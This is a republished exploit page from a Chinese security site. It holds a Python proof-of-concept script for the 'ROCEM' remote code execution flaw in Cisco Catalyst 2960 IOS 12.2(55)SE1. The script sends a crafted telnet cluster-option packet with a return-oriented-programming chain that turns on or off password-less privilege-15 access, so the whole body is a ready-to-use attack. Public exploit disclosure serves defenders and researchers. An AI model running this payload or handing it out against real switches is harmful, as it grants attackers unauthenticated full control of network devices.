首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution
来源:@artkond 作者:Kondratenko 发布时间:2017-06-06  
#!/usr/bin/python
# Author:
#  Artem Kondratenko (@artkond)
 
import socket
import sys
from time import sleep
 
set_credless = True
 
if len(sys.argv) < 3:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()
elif sys.argv[2] == '--unset':
    set_credless = False
elif sys.argv[2] == '--set':
    pass
else:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()
 
 
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
 
print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'
 
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
 
 
 
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4'       # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74'       # +8  address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
    payload += '\x00\x00\x99\x80'   # +12 set  address of func that rets 1
else:
    payload +=  '\x00\x04\xea\x58'  # unset
payload += 'BBBB'                   # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8'       # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC'                   # +8
payload += 'DDDD'                   # +12
payload += 'EEEE'                   # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c'       # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60'       # +8  r1+8 = 0x022c8b60
payload += 'FFFF'                   # +12
payload += 'GGGG'                   # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28'       # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
    payload += '\x00\x12\x52\x1c'   # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
    payload += '\x00\x04\xe6\xf0'   # unset
payload += 'HHHH'                   # +12
payload += 'IIII'                   # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60'       # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ'                   # +8 r1 points here at third gadget
payload += 'KKKK'                   # +12
payload += 'LLLL'                   # +16
payload += '\x01\x13\x31\xa8'       # +20 original execution flow return addr
payload += ':15:' +  '\xff\xf0'
 
s.send(payload)
 
print '[+] All done'
 
s.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BIND 9.10.5 - Unquoted Service
·DC/OS Marathon UI - Docker Exp
·Parallels Desktop - Virtual Ma
·Linux Kernel - 'ping' Local De
·DNSTracer 1.8.1 - Buffer Overf
·Linux Kernel < 4.10.13 - 'keyc
·EnGenius EnShare IoT Gigabit C
·PuTTY < 0.68 - 'ssh_agent_chan
·Disk Sorter 9.7.14 - 'Input Di
·Mikrotik RouterOS 6.28 FTP Buf
·Intel AMT Digest Authenticatio
·Windows UAC Protection Bypass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved